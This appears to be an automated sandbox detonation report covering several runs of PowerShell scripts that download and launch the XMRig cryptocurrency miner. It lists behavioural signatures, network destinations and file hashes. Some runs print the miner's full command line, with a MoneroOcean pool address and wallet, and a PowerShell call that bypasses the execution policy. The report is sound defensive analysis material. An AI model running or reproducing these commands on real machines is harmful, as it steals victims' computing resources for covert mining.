N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/4212-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp

memory/4212-5-0x000002003F870000-0x000002003F892000-memory.dmp

memory/4212-8-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-9-0x000002003FA20000-0x000002003FA96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmahcz4d.k35.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4212-10-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-48-0x000002003FA00000-0x000002003FA12000-memory.dmp

memory/4212-61-0x000002003F9E0000-0x000002003F9EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4612-90-0x000001EB01B30000-0x000001EB01B50000-memory.dmp

memory/4612-91-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4212-93-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win10v2004-20240508-en

Max time kernel

1625s

Max time network

1636s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/1976-0-0x00007FFA45923000-0x00007FFA45925000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1j5jifp.sd5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1976-1-0x0000027957740000-0x0000027957762000-memory.dmp

memory/1976-11-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-12-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-13-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-14-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-15-0x00007FFA45923000-0x00007FFA45925000-memory.dmp

memory/1976-16-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-17-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:47

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1560s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Network

N/A

Files

memory/2248-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

memory/2248-5-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2248-6-0x0000000002730000-0x0000000002738000-memory.dmp

memory/2248-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-11-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-12-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 224.107.17.2.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/4156-0-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1yjtfmd.0pk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4156-10-0x000001CDF9EE0000-0x000001CDF9F02000-memory.dmp

memory/4156-11-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-12-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-14-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-15-0x000001CDFAA40000-0x000001CDFAA52000-memory.dmp

memory/4156-16-0x000001CDFAA20000-0x000001CDFAA2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:04

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/1844-0-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nbcer0p.e3b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1844-10-0x000001FD79030000-0x000001FD79052000-memory.dmp

memory/1844-11-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-12-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-14-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-15-0x000001FD79420000-0x000001FD79432000-memory.dmp

memory/1844-16-0x000001FD79400000-0x000001FD7940A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:09

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/4656-0-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp

memory/4656-1-0x000001FAFC530000-0x000001FAFC552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2hsruara.gkb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-11-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-12-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-13-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-14-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-15-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp

memory/4656-16-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-17-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp